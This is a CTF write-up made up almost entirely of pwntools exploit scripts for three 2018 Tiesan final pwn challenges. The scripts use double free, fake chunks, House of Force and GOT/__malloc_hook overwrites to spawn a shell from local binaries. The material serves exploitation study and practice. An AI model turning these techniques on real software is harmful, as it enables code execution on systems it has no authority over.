2018铁三赛决赛三道pwn题exp
 
2018铁三赛决赛三道pwn题exp
0x01 littlenote
double free和写malloc_hook
from pwn import *
#context.log_level="debug"
# Target process and the libc build whose hard-coded offsets the script
# below depends on (0x3C4B20 and the one_gadget value); no other build works.
p = process("./littlenote")
libc = ELF("./libc.so.6")
def add(data):
    """Menu option 1: create a note holding *data* and answer the keep prompt.

    *data* is sent raw (no newline); the keep prompt gets "Y" plus a NUL.
    """
    steps = (
        ("choice:", p.sendline, "1"),
        ("your note", p.send, data),
        ("keep your note?", p.send, "Y\x00"),
    )
    for marker, sender, payload in steps:
        p.recvuntil(marker)
        sender(payload)
def show(idx):
    """Menu option 2: print the contents of note *idx*."""
    for marker, answer in (("choice:", "2"), ("show?", str(idx))):
        p.recvuntil(marker)
        p.sendline(answer)
def dele(idx):
    """Menu option 3: delete note *idx*."""
    for marker, answer in (("choice:", "3"), ("delete?", str(idx))):
        p.recvuntil(marker)
        p.sendline(answer)
# NOTE(review): the whole chain rests on the note program freeing the same
# index twice and still letting show() read a freed note (double free +
# use-after-free). It also presumes a libc whose allocator has no tcache
# double-free detection and still honours __malloc_hook (the hook was removed
# in glibc 2.34), and every offset below is for one specific build.
#
# --- Stage 1: heap address leak --------------------------------------------
# Four notes; the last one carries what looks like a fake chunk header
# (size field 0x51) inside its body -- presumably for a later forged chunk,
# TODO confirm in gdb.
add("A"*0x10)
add("B"*0x10)
add("C"*0x10)
add("D"*0x10+p64(0)+p64(0x51))
# Note 1 is freed twice with note 0 in between; reading note 0 afterwards
# returns the allocator's forward pointer, which is a heap address.
dele(1)
dele(0)
dele(1)
show(0)
p.recvline()
heap = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00"))
print hex(heap)
# --- Stage 2: libc address leak ---------------------------------------------
# The re-allocated chunk is given a pointer (heap+0x10) and a 0x71 size
# field; the last add() plants a 0x91 size field so that freeing note 2
# leaves a chunk whose forward pointer is a main_arena address (presumably;
# the -88 below is the unsorted-bin head offset -- confirm against the libc).
add(p64(heap+0x10)+p64(0x71))
add("\x00")
add(p64(heap+0x10)+p64(0x71))
add("F"*0x50+p64(0)+p64(0x91))
dele(2)
show(2)
p.recvline()
main = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00"))
# 0x3C4B20 is the main_arena offset of this libc build only (consistent with
# glibc 2.23 -- TODO confirm with the bundled libc.so.6).
libc_addr = (main - 88) - 0x3C4B20
print hex(libc_addr)
malloc_hook = libc_addr + libc.symbols['__malloc_hook']
print hex(malloc_hook)
# --- Stage 3: overwrite __malloc_hook ---------------------------------------
# Same double-free pattern on three fresh notes (#8, #9, #10).
add("1"*0x10) #8
add("2"*0x10) #9
add("3"*0x10)
dele(9)
dele(8)
dele(9)
# Forward pointer set to __malloc_hook-0x23, so a later allocation is handed
# memory whose user area starts 19 bytes before the hook (see the padding
# in the last add()).
add(p64(malloc_hook-27-0x8))
add("5"*0x10)
add(p64(malloc_hook-27-0x8))
# Hard-coded one_gadget offset for this libc build.
one_gadget = 0xf0274
# 19 bytes of padding land the gadget address exactly on __malloc_hook.
add("A"*19+p64(libc_addr + one_gadget))
# The next menu action that allocates runs the hook.
p.recvuntil(":")
p.sendline(str(1))
p.interactive()
0x02 bookstore
在bss段和stack上伪造chunk
from pwn import *
def ru(data, drop=False):
    """Read from the target up to *data*; the marker is dropped when *drop* is set."""
    received = p.recvuntil(data, drop=drop)
    return received
def rl():
    """Read one line from the target."""
    line = p.recvline()
    return line
def ra():
    """Read everything the target sends until it closes."""
    everything = p.recvall()
    return everything
def r(l):
    """Read up to *l* bytes from the target."""
    chunk = p.recv(l)
    return chunk
def sl(data):
    """Send *data* to the target followed by a newline."""
    p.sendline(data)
def s(data):
    """Send *data* to the target as-is (no trailing newline)."""
    p.send(data)
def ga(data, rd="\x0a"):
    """Skip past *data*, then decode the bytes up to *rd* as a little-endian u64.

    Fewer than 8 bytes are right-padded with NUL before decoding.
    """
    ru(data)
    raw = ru(rd, drop=True)
    padded = raw.ljust(8, "\x00")
    return u64(padded)
def g():
    """Attach gdb to the target, then block until Enter is pressed."""
    gdb.attach(p)
    raw_input()
def ri():
    """Pause the script until Enter is pressed."""
    raw_input()
def add(author, l, book):
    """Menu option 1: register a book with *author*, length *l* and text *book*.

    The menu choice is padded with seven NUL bytes, as the original did.
    """
    steps = (
        ("choice:", "1" + "\x00" * 0x7),
        ("author", author),
        ("long", str(l)),
        ("book?", book),
    )
    for marker, answer in steps:
        ru(marker)
        sl(answer)
def read(idx):
    """Menu option 3: print book *idx*."""
    for marker, answer in ((":", "3"), ("sell", str(idx))):
        ru(marker)
        sl(answer)
def sell(idx):
    """Menu option 2: sell (free) book *idx*."""
    for marker, answer in ((":", "2"), ("sell", str(idx))):
        ru(marker)
        sl(answer)
def et():
    """Menu option 4: leave the program."""
    ru(":")
    sl("4")
if __name__ == '__main__':
    #context.log_level = "debug"
    libc = ELF("./libc.so.6")
    p = process("./bookstore")
    # NOTE(review): every absolute value below (0x3C4B20, 0x45216, 0x602060,
    # 0x400c70) is tied to this libc build and a non-PIE binary; the script
    # is not portable. The underlying bug appears to be that sell() leaves a
    # dangling entry that read()/add() still use -- TODO confirm in the binary.
    #
    # --- Stage 1: libc address leak -----------------------------------------
    add("A"*0x10,0x10,"1"*0x8)
    add("B"*0x10,0x40,"2"*0x10)
    add("C"*0x10,0x40,"3"*0x10)
    add("D"*0x10,0x40,"4"*0x10)
    sell(0)
    # Slot 0 is reused: the author field carries a fake chunk header (size
    # 0x51) and the 0-length book plants a 0xa1 size field, presumably so
    # the next sell(1) frees a chunk large enough to carry a main_arena
    # pointer -- confirm in gdb.
    add(p64(0)+p64(0x51),0,p64(0)*3+p64(0xa1))
    sell(1)
    add("W"*0x10,0x40,'6'*8)
    # The 8 bytes printed right after '6'*8 are the main_arena pointer.
    read(1)
    main = ga("6"*0x8)
    # 0x3C4B20: main_arena offset of this libc build only (consistent with
    # glibc 2.23 -- TODO confirm with the bundled libc.so.6).
    libc_addr = (main - 232) - 0x3C4B20
    print hex(libc_addr)
    env = libc_addr + libc.symbols['environ']
    print hex(env)
    # --- Stage 2: stack address leak through environ ------------------------
    sell(0)
    sell(1)
    # Fake chunk whose forward pointer is 0x602060 (the bss chunk from the
    # heading): the following adds are served from bss, and the last one
    # overwrites a stored pointer with &environ.
    add(p64(0)+p64(0x51),0,p64(0)*3+p64(0x51)+p64(0x602060))
    add("X"*0x10,0x40,'2'*0x10)
    add("Z"*0x10,0x40,p64(0)*2+p64(env))
    read(0)
    stack = ga("name:")
    print hex(stack)
    # Stack frame targeted below, 0x110 bytes below the environ value.
    fake = stack - 0x110
    print hex(fake)
    # Hard-coded one_gadget offset for this libc build.
    one = libc_addr + 0x45216
    # --- Stage 3: fake chunk on the stack -----------------------------------
    add("A"*0x10,0x10,"1"*0x8)
    add("B"*0x10,0x20,"2"*0x10)
    add("C"*0x10,0x20,"3"*0x10)
    sell(5)
    sell(6)
    # Same pattern with a 0x31 header and the stack address as forward
    # pointer, so the second add() below writes into that frame: 0x400c70
    # (an address inside the binary -- presumably a return site, TODO
    # confirm) followed by the one_gadget address.
    add('s'*0x10,0,p64(0)*3+p64(0x31)+p64(fake))
    add("B"*0x10,0x20,"2"*0x10)
    add('A'*0x10,0x20,p64(0)+p64(0x400c70)+p64(one))
    # Exiting unwinds through the patched frame.
    et()
    p.interactive()
0x03 myhouse
一个任意地址写null漏洞和house of force
from pwn import *
def ru(data, drop=False):
    """Read from the target up to *data*; the marker is dropped when *drop* is set."""
    received = p.recvuntil(data, drop=drop)
    return received
def rl():
    """Read one line from the target."""
    line = p.recvline()
    return line
def ra():
    """Read everything the target sends until it closes."""
    everything = p.recvall()
    return everything
def r(l):
    """Read up to *l* bytes from the target."""
    chunk = p.recv(l)
    return chunk
def sl(data):
    """Send *data* to the target followed by a newline."""
    p.sendline(data)
def s(data):
    """Send *data* to the target as-is (no trailing newline)."""
    p.send(data)
def ga(data, rd="\x0a"):
    """Skip past *data*, then decode the bytes up to *rd* as a little-endian u64.

    Fewer than 8 bytes are right-padded with NUL before decoding.
    """
    ru(data)
    raw = ru(rd, drop=True)
    padded = raw.ljust(8, "\x00")
    return u64(padded)
def g():
    """Attach gdb to the target, then block until Enter is pressed."""
    gdb.attach(p)
    raw_input()
def ri():
    """Pause the script until Enter is pressed."""
    raw_input()
def gp():
    """Print the target's pid (for attaching a debugger by hand), then pause."""
    pid = proc.pidof(p)[0]
    print pid
    ri()
def add(n, hn, hs1, hs, hd):
    """Answer the five start-up prompts in order.

    *n* is the name, *hn* the house name, *hs1* a first size answer that the
    program is expected to reject with "Too large!", *hs* the retried size and
    *hd* the description. Everything is sent raw (no newline appended).
    """
    prompts = (
        ("What's your name?", n),
        ("name of your house?", hn),
        ("size of your house?", str(hs1)),
        ("Too large!", str(hs)),
        ("description:\n", hd),
    )
    for marker, answer in prompts:
        ru(marker)
        s(answer)
def broom(rs):
    """Menu option 1: build a room of size *rs*."""
    for marker, answer in (("choice:", "1"), ("size of your room", str(rs))):
        ru(marker)
        sl(answer)
def droom(rd):
    """Menu option 2: decorate the room with the raw bytes *rd* (newline appended)."""
    for marker, answer in (("choice:", "2"), ("more shining", rd)):
        ru(marker)
        sl(answer)
def view():
    """Menu option 3: display the house."""
    ru("choice:")
    sl("3")
if __name__ == '__main__':
    # context.log_level = "debug"
    libc = ELF("./libc.so.6")
    p = process("./myhouse")
    # NOTE(review): 0x3c4b78 (main_arena.top), 0x6020b0 and 0x602058 (bss and
    # atoi@got of a non-PIE binary) are build-specific; the script is not
    # portable. The bug from the heading is a single NUL written to an
    # attacker-chosen address, turned into House of Force via a forged top
    # chunk size of -1.
    top = 0x3c4b78
    # House size large enough to be served by mmap rather than the brk heap.
    size = 0x201000
    # First size answer: chosen so the mmap'd house lands directly below libc
    # and the stray NUL clears the low byte of main_arena.top. The program is
    # expected to reject it with "Too large!" and take 0x200000 on retry
    # (presumably; confirm in gdb).
    ps = size - 0x10 + top + 1
    # The house name ends with a fake chunk header whose size is -1, i.e. an
    # unbounded top chunk.
    add("A"*0x20 ,"1"*0xf0+p64(0)+p64(0xffffffffffffffff),ps,0x200000,'2'*0x20)
    view()
    # Heap address is printed right after the 0x20-byte name.
    heap = ga("A"*0x20)
    bss = 0x6020b0
    # Distance from the forged top chunk's user area (heap+0x100) to the bss
    # target; a room of exactly that size moves the top chunk onto bss.
    hs = bss - (heap + 0x100)
    print hex(heap)
    print hex(hs)
    # Move the top chunk to the bss segment.
    broom(hs)
    # The next room is carved out of bss.
    broom(0x60)
    atoi = 0x602058
    # Overwrite the bss record with atoi@got as both pointer fields and a
    # length of 8, so view()/droom() now operate on the GOT entry.
    pay = p64(atoi) + p64(atoi) + p64(8)
    droom(pay)
    # view() prints the GOT entry, i.e. atoi's resolved address.
    view()
    atoi_addr = ga("description:\x0a")
    print hex(atoi_addr)
    system_addr = atoi_addr -libc.symbols['atoi'] + libc.symbols['system']
    print hex(system_addr)
    # Point atoi@got at system: every menu choice is now passed to system().
    droom(p64(system_addr))
    ru("choice:")
    # The menu input itself becomes the command string.
    s("/bin/sh\x00")
    ru("choice:")
    p.interactive()